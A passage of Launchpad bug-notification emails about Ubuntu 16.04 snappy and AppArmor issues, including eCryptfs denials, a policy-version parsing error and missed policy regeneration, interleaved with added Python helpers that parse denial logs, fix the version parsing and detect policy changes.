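        print(label, errors(lint_snap_yaml(snap)))
```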
[Group.of.nepali.translators] [Bug 1574556] Re: apparmor denials reported for encrypted HOME

This was fixed in yakkety -- not sure why it wasn't auto-closed.

ubuntu-core-launcher (1.0.29) yakkety; urgency=medium

  * debian/usr.bin.ubuntu-core-launcher: add workaround rules for ecryptfs
    until the upcoming kernel fix lands everywhere (LP: #1574556)

** Changed in: ubuntu-core-launcher (Ubuntu)
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1574556

Title:
  apparmor denials reported for encrypted HOME

Status in Snappy:
  Triaged
Status in ubuntu-core-launcher package in Ubuntu:
  Fix Released
Status in ubuntu-core-launcher source package in Xenial:
  Triaged

Bug description:
  I just did a fresh install of Ubuntu 16.04 with encrypted $HOME. I've
  installed my links snap and it seems to work but I see odd apparmor
  denials in syslog:

  abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000
  abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000
  abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfh5TefvZX.jl5R9fjgnc45G---/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000
  abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfh5TefvZX.jl5R9fjgnc45G---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhJJq4TueYwFMXoSVrZyfk0E--/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000
  abr 25 12:09:25 vm kernel: audit_printk_skb: 36 callbacks suppressed

To manage notifications about this bug go to:
https://bugs.launchpad.net/snappy/+bug/1574556/+subscriptions

___
Mailing list: https://launchpad.net/~group.of.nepali.translators
Post to     : group.of.nepali.translators@lists.launchpad.net
Unsubscribe : https://launchpad.net/~group.of.nepali.translators
More help   : https://help.launchpad.net/ListHelp
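A small triage helper for denial lines like the ones quoted in this report, added here as an illustration; it is not part of the bug report and not ubuntu-core-launcher's code. It parses AppArmor AVC audit records into their key=value fields, groups the denied paths by profile, operation and denied mask, recognises the eCryptfs lower directory (/home/.ecryptfs/<user>/.Private/...), and collapses the per-user name and the per-file ECRYPTFS_FNEK_ENCRYPTED.* components into a glob, which is the shape any rule covering this location would have to take. The sample log is a constructed copy of two of the denials above plus the kernel "callbacks suppressed" line; the glob shape is an assumption and not the workaround rules that shipped in 1.0.29.

```python
import re
from collections import defaultdict

# Constructed sample: two of the denial lines from the report above plus the
# kernel "callbacks suppressed" line, which is not an AVC record.
SAMPLE_LOG = """\
abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000
abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000
abr 25 12:09:25 vm kernel: audit_printk_skb: 36 callbacks suppressed
"""

# key="quoted value" or key=bare_value, the two field shapes AppArmor emits
_FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# The eCryptfs lower (ciphertext) directory of an encrypted home
_LOWER_DIR_RE = re.compile(r"^/home/\.ecryptfs/[^/]+/\.Private(/|$)")


def parse_avc_line(line):
    """Return the key=value fields of one AppArmor AVC record, or None for other lines."""
    if 'apparmor="' not in line:
        return None
    fields = {}
    for key, quoted, bare in _FIELD_RE.findall(line):
        fields[key] = quoted if quoted else bare
    return fields


def summarize_denials(log_text):
    """Group denied paths by (profile, operation, denied_mask) for triage."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        f = parse_avc_line(line)
        if f is None or f.get("apparmor") != "DENIED" or "name" not in f:
            continue
        groups[(f["profile"], f["operation"], f["denied_mask"])].append(f["name"])
    return dict(groups)


def is_ecryptfs_backing_path(path):
    """True when the denied path is the ciphertext side of an encrypted home."""
    return _LOWER_DIR_RE.match(path) is not None


def generalize_ecryptfs_path(path):
    """Replace the user name and each FNEK-encrypted component with '*'.

    Encrypted file names differ per user and per file, so a rule naming them
    literally would never match elsewhere (assumed rule shape, not the
    workaround that shipped).
    """
    parts = path.split("/")
    out = []
    for i, part in enumerate(parts):
        is_user = i == 3 and parts[1:3] == ["home", ".ecryptfs"]
        if is_user or part.startswith("ECRYPTFS_FNEK_ENCRYPTED."):
            out.append("*")
        else:
            out.append(part)
    return "/".join(out)


def globs_for_denials(log_text):
    """Distinct path patterns behind the eCryptfs denials in the log, sorted."""
    globs = set()
    for paths in summarize_denials(log_text).values():
        for p in paths:
            if is_ecryptfs_backing_path(p):
                globs.add(generalize_ecryptfs_path(p))
    return sorted(globs)


if __name__ == "__main__":
    for key, paths in summarize_denials(SAMPLE_LOG).items():
        print(key, len(paths), "denial(s)")
    print(globs_for_denials(SAMPLE_LOG))
```

The point of the grouping step is that the four denials in the report are one problem, not four: the same profile, the same operation and the same mask on successive components of the same lower directory, which is what makes a single pattern the right response rather than a rule per path.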
[Group.of.nepali.translators] [Bug 1573188] Re: unity7 interface doesn't cover indicators or notifications
The fix for this is in 2.0.5 so closing the upstream task.

** Changed in: snappy
       Status: In Progress => Fix Released

** Changed in: snapd (Ubuntu Xenial)
   Importance: Undecided => High

** Changed in: snapd (Ubuntu)
   Importance: Undecided => High

-- 
https://bugs.launchpad.net/bugs/1573188

Title:
  unity7 interface doesn't cover indicators or notifications

Status in Snappy:
  Fix Released
Status in snapd package in Ubuntu:
  Fix Committed
Status in snapd source package in Xenial:
  Fix Committed

Bug description:
  Using the "unity7" interface, it seems that the access required to
  utilize indicators or display notifications is not granted (note that
  installing with --devmode works).

  To duplicate:

  1) Build/install the Qt systray example snap here:
     https://github.com/kyrofa/qt-example-snaps/tree/master/systray
  2) Install without devmode, e.g. sudo snap install systray_1_amd64.snap
  3) Launch from the terminal with the `systray` command.
  4) Click "Show Message".
  5) Note the presence of a launcher icon, the lack of an indicator, and a
     very ugly notification, like this: http://pasteboard.co/nF8fKsP.png
  6) Uninstall the snap: sudo snap remove systray
  7) Install the snap with devmode, e.g. sudo snap install --devmode systray_1_amd64.snap
  8) Launch from the terminal again.
  9) Click "Show Message".
  10) Note the presence of a launcher icon, the presence of an indicator
      (with a broken icon, but that may be a different issue), and a
      pretty notification, like this: http://pasteboard.co/nFoPlFh.png
[Group.of.nepali.translators] [Bug 1574556] Re: apparmor denials reported for encrypted HOME

** Changed in: ubuntu-core-launcher (Ubuntu)
       Status: Fix Released => Fix Committed

-- 
https://bugs.launchpad.net/bugs/1574556

Title:
  apparmor denials reported for encrypted HOME

Status in Snappy:
  Triaged
Status in ubuntu-core-launcher package in Ubuntu:
  Fix Committed
Status in ubuntu-core-launcher source package in Xenial:
  Triaged
[Group.of.nepali.translators] [Bug 1581097] [NEW] click-apparmor does not properly calculate the policy version with 15.10 policy
Public bug reported:

aa-clickhook fails with wily frameworks because of this:
apparmor.easyprof.AppArmorException: "Could not find templates directory '/usr/share/apparmor/easyprof/templates/ubuntu/15.1'".

It is reading the json 15.10 number for policy version as 15.1.

** Affects: click-apparmor (Ubuntu)
     Importance: High
     Assignee: Jamie Strandboge (jdstrand)
         Status: In Progress

** Affects: click-apparmor (Ubuntu Xenial)
     Importance: High
     Assignee: Jamie Strandboge (jdstrand)
         Status: Triaged

** Affects: click-apparmor (Ubuntu Yakkety)
     Importance: High
     Assignee: Jamie Strandboge (jdstrand)
         Status: In Progress

** Also affects: click-apparmor (Ubuntu Xenial)
   Importance: Undecided
       Status: New

** Also affects: click-apparmor (Ubuntu Yakkety)
   Importance: Undecided
       Status: New

** Changed in: click-apparmor (Ubuntu Yakkety)
       Status: New => In Progress

** Changed in: click-apparmor (Ubuntu Xenial)
       Status: New => Triaged

** Changed in: click-apparmor (Ubuntu Yakkety)
   Importance: Undecided => High

** Changed in: click-apparmor (Ubuntu Xenial)
   Importance: Undecided => High

** Changed in: click-apparmor (Ubuntu Yakkety)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: click-apparmor (Ubuntu Xenial)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

-- 
https://bugs.launchpad.net/bugs/1581097

Title:
  click-apparmor does not properly calculate the policy version with
  15.10 policy

Status in click-apparmor package in Ubuntu:
  In Progress
Status in click-apparmor source package in Xenial:
  Triaged
Status in click-apparmor source package in Yakkety:
  In Progress
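An added illustration of the 15.10 -> 15.1 failure described in this report; it is not click-apparmor's code, and the manifest fragments, the function names and the choice of fix are constructed for the example. When policy_version is written as a JSON number, json.loads hands back the float 15.1, str() of that is "15.1", and the templates path loses its trailing zero, which is exactly the directory the traceback above could not find. Asking the JSON decoder to keep the literal as text preserves "15.10" whether it was written as a number or a string, and comparing versions as integer tuples avoids the same trap in ordering, since 15.10 is a later release than 15.2 but a smaller float.

```python
import json
import os
import re

# Where the traceback in the report looked for per-version templates
TEMPLATES_ROOT = "/usr/share/apparmor/easyprof/templates/ubuntu"

# Constructed manifest fragments: the same version as a JSON number and as a string
MANIFEST_AS_NUMBER = '{"policy_version": 15.10}'
MANIFEST_AS_STRING = '{"policy_version": "15.10"}'


def naive_templates_dir(manifest_json):
    """The failing behaviour: json.loads turns the literal 15.10 into the float 15.1."""
    data = json.loads(manifest_json)
    return os.path.join(TEMPLATES_ROOT, str(data["policy_version"]))


def version_from_manifest(manifest_json):
    """Return the policy version as the text that was written in the manifest.

    parse_float/parse_int pass the original number literal to str instead of
    float/int, so a trailing zero survives; a string value is returned as-is.
    Anything that is not MAJOR.MINOR is rejected rather than guessed at.
    """
    data = json.loads(manifest_json, parse_float=str, parse_int=str)
    version = data["policy_version"]
    if not isinstance(version, str) or not re.fullmatch(r"\d+\.\d+", version):
        raise ValueError("policy_version must look like MAJOR.MINOR: %r" % (version,))
    return version


def templates_dir(manifest_json):
    """Templates directory for the manifest's policy version, with the text preserved."""
    return os.path.join(TEMPLATES_ROOT, version_from_manifest(manifest_json))


def version_key(version):
    """(major, minor) as integers, so 15.10 sorts after 15.2 as a release should."""
    major, minor = version.split(".")
    return (int(major), int(minor))


if __name__ == "__main__":
    print("naive:", naive_templates_dir(MANIFEST_AS_NUMBER))
    print("fixed:", templates_dir(MANIFEST_AS_NUMBER))
    print("15.10 newer than 15.2:", version_key("15.10") > version_key("15.2"))
```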
[Group.of.nepali.translators] [Bug 1569581] Re: snapd no longer detects apparmor changes on upgrade
Ok, I've added an apparmor task and assigned to me. Leaving the snappy
tasks open for "we will re-load all profiles for a specific snap each
time something in that snap changes *AND* we promise to detect changes
to the internal templates built into snappy" where I understand the
first part is done but the changes to internal templates are not.
Assigning zyga for the time being -- please adjust as necessary.

** Also affects: apparmor (Ubuntu)
   Importance: Undecided
       Status: New

** Changed in: snapd (Ubuntu)
       Status: New => Triaged

** Changed in: snapd (Ubuntu Xenial)
       Status: New => Triaged

** Changed in: apparmor (Ubuntu)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: apparmor (Ubuntu Xenial)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: apparmor (Ubuntu)
       Status: New => Triaged

** Changed in: apparmor (Ubuntu Xenial)
       Status: New => Triaged

** Changed in: snappy
     Assignee: (unassigned) => Zygmunt Krynicki (zyga)

** Changed in: apparmor (Ubuntu)
   Importance: Undecided => High

** Changed in: apparmor (Ubuntu Xenial)
   Importance: Undecided => High

-- 
https://bugs.launchpad.net/bugs/1569581

Title:
  snapd no longer detects apparmor changes on upgrade

Status in Snappy:
  Triaged
Status in apparmor package in Ubuntu:
  Triaged
Status in snapd package in Ubuntu:
  Triaged
Status in apparmor source package in Xenial:
  Triaged
Status in snapd source package in Xenial:
  Triaged

Bug description:
  snappy in 16.04 used to compare /usr/share/snappy/security-policy-version
  and /var/lib/snappy/security-policy-version on boot to see if the
  apparmor package changed and therefore if it needed to regenerate all
  snap policy. This functionality was recently removed with nothing added
  to replace it.

  snapd must have a means to detect changes to the parser or the
  abstractions which the snap may #include, otherwise we cannot deliver
  parser and policy fixes from apparmor to installed snaps. It is fine to
  use a different method than what we had before, but we need to have
  something.
[Group.of.nepali.translators] [Bug 1574556] Re: apparmor denials reported for encrypted HOME

** Also affects: ubuntu-core-launcher (Ubuntu Xenial)
   Importance: Undecided
       Status: New

-- 
https://bugs.launchpad.net/bugs/1574556

Title:
  apparmor denials reported for encrypted HOME

Status in Snappy:
  New
Status in ubuntu-core-launcher package in Ubuntu:
  New
Status in ubuntu-core-launcher source package in Xenial:
  New
[Group.of.nepali.translators] [Bug 1567780] Re: Fails to start snappy-autopilot.service in a default install
** Package changed: snappy (Ubuntu Xenial) => snapd (Ubuntu Xenial)

-- 
https://bugs.launchpad.net/bugs/1567780

Title:
  Fails to start snappy-autopilot.service in a default install

Status in snapd package in Ubuntu:
  New
Status in snapd source package in Xenial:
  New

Bug description:
  Since snappy is now installed by default on cloud images, it fails to
  start:

  ● ubuntu-snappy.boot-ok.service - Notify bootloader that boot was successful
     Loaded: loaded (/lib/systemd/system/ubuntu-snappy.boot-ok.service; enabled; vendor preset: enabled)
     Active: failed (Result: exit-code) since Fri 2016-04-08 08:33:05 CEST; 6min ago
    Process: 938 ExecStart=/usr/bin/snappy booted (code=exited, status=1/FAILURE)
   Main PID: 938 (code=exited, status=1/FAILURE)

  Apr 08 08:33:05 autopkgtest systemd[1]: Starting Notify bootloader that boot was successful...
  Apr 08 08:33:05 autopkgtest snappy[938]: No option snappy_os in section
  Apr 08 08:33:05 autopkgtest /usr/bin/snappy[938]: main.go:50: DEBUG: [/usr/bin/snappy booted] failed: No option snappy_os in section
  Apr 08 08:33:05 autopkgtest systemd[1]: ubuntu-snappy.boot-ok.service: Main process exited, code=exited, status=1/FAILURE
  Apr 08 08:33:05 autopkgtest systemd[1]: Failed to start Notify bootloader that boot was successful.
  Apr 08 08:33:05 autopkgtest systemd[1]: ubuntu-snappy.boot-ok.service: Unit entered failed state.
  Apr 08 08:33:05 autopkgtest systemd[1]: ubuntu-snappy.boot-ok.service: Failed with result 'exit-code'.

  ubuntu-snappy.run-hooks.service - Regenerate snappy security policies
     Loaded: loaded (/lib/systemd/system/ubuntu-snappy.run-hooks.service; enabled; vendor preset: enabled)
     Active: failed (Result: exit-code) since Fri 2016-04-08 08:33:04 CEST; 6min ago
    Process: 596 ExecStart=/bin/sh -c set -ex; if ! cmp /usr/share/snappy/security-policy-version /var/lib/snappy/security-policy-version; then /usr/bin/snappy policygen --regenerate-all; cp /usr/share/snappy/security-policy-version /var/lib/snappy/; fi (code=exited, status=1/FAILURE)
   Main PID: 596 (code=exited, status=1/FAILURE)

  Apr 08 08:33:04 autopkgtest systemd[1]: Starting Regenerate snappy security policies...
  Apr 08 08:33:04 autopkgtest sh[596]: + cmp /usr/share/snappy/security-policy-version /var/lib/snappy/security-policy-version
  Apr 08 08:33:04 autopkgtest sh[596]: cmp: /usr/share/snappy/security-policy-version: No such file or directory
  Apr 08 08:33:04 autopkgtest sh[596]: + /usr/bin/snappy policygen --regenerate-all
  Apr 08 08:33:04 autopkgtest sh[596]: + cp /usr/share/snappy/security-policy-version /var/lib/snappy/
  Apr 08 08:33:04 autopkgtest sh[596]: cp: cannot stat '/usr/share/snappy/security-policy-version': No such file or directory
  Apr 08 08:33:04 autopkgtest systemd[1]: ubuntu-snappy.run-hooks.service: Main process exited, code=exited, status=1/FAILURE
  Apr 08 08:33:04 autopkgtest systemd[1]: Failed to start Regenerate snappy security policies.
  Apr 08 08:33:04 autopkgtest systemd[1]: ubuntu-snappy.run-hooks.service: Unit entered failed state.
  Apr 08 08:33:04 autopkgtest systemd[1]: ubuntu-snappy.run-hooks.service: Failed with result 'exit-code'.
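The two snapd reports above come down to the same check: the ExecStart script in this one compares a shipped security-policy-version file with a stored copy and falls over when the shipped file is absent (cmp fails, the regeneration runs, then cp cannot stat the missing source), and bug 1569581 asks for some way to notice that the apparmor parser or the abstractions a snap may #include have changed, without prescribing the old file-comparison method. The following is an added sketch of such a check, written for this thread and not snapd's or snappy's code: it fingerprints the parser binary and the abstractions directory, compares the digest with a stored stamp, treats a missing stamp as "changed" (first boot), and writes the stamp only after regeneration has succeeded, so a failed run is retried rather than masked. The directory layout, file contents and the regenerate callback in demo() are constructed for the example.

```python
import hashlib
import os
import tempfile


def fingerprint_policy_inputs(paths):
    """SHA-256 over the names and contents of every file under the given paths.

    Directories are walked in sorted order so the digest is stable across
    runs; a path that does not exist contributes nothing instead of raising,
    which is the case the ExecStart script above did not handle.
    """
    digest = hashlib.sha256()
    for root in sorted(paths):
        if os.path.isfile(root):
            files, base = [root], os.path.dirname(root)
        else:
            files, base = [], root
            for dirpath, dirnames, filenames in os.walk(root):
                dirnames.sort()
                files.extend(os.path.join(dirpath, fn) for fn in sorted(filenames))
        for path in files:
            digest.update(os.path.relpath(path, base).encode() + b"\0")
            with open(path, "rb") as fh:
                digest.update(fh.read())
            digest.update(b"\0")
    return digest.hexdigest()


def read_stamp(stamp_path):
    """Fingerprint recorded at the last regeneration, or None when no stamp exists yet."""
    try:
        with open(stamp_path) as fh:
            return fh.read().strip()
    except FileNotFoundError:
        return None


def regenerate_if_changed(inputs, stamp_path, regenerate):
    """Run regenerate() when the inputs differ from the stamp; return True if it ran.

    The stamp is derived from the inputs themselves, so there is no second
    file to copy, and it is replaced atomically only after regenerate()
    returned without raising.
    """
    current = fingerprint_policy_inputs(inputs)
    if read_stamp(stamp_path) == current:
        return False
    regenerate()
    tmp = stamp_path + ".tmp"
    with open(tmp, "w") as fh:
        fh.write(current + "\n")
    os.replace(tmp, stamp_path)
    return True


def demo():
    """Constructed run: first boot, an unchanged boot, then an edited abstraction."""
    results = []
    with tempfile.TemporaryDirectory() as d:
        abstractions = os.path.join(d, "abstractions")
        os.makedirs(abstractions)
        with open(os.path.join(abstractions, "base"), "w") as fh:
            fh.write("# constructed abstraction\n/etc/ld.so.cache r,\n")
        parser = os.path.join(d, "apparmor_parser")  # stand-in for the parser binary
        with open(parser, "wb") as fh:
            fh.write(b"placeholder parser build 1")
        stamp = os.path.join(d, "security-policy-version")
        calls = []
        regen = lambda: calls.append("regen")
        inputs = [abstractions, parser]
        results.append(regenerate_if_changed(inputs, stamp, regen))  # no stamp yet -> True
        results.append(regenerate_if_changed(inputs, stamp, regen))  # nothing changed -> False
        with open(os.path.join(abstractions, "base"), "a") as fh:
            fh.write("/etc/nsswitch.conf r,\n")                       # an abstraction update lands
        results.append(regenerate_if_changed(inputs, stamp, regen))  # -> True
        results.append(len(calls))
    return results


if __name__ == "__main__":
    print(demo())
```

Hashing the parser binary rather than reading a version string is deliberate: a parser fix can ship without a policy-version bump, and the complaint in 1569581 is precisely that parser and abstraction fixes must reach already-installed snaps.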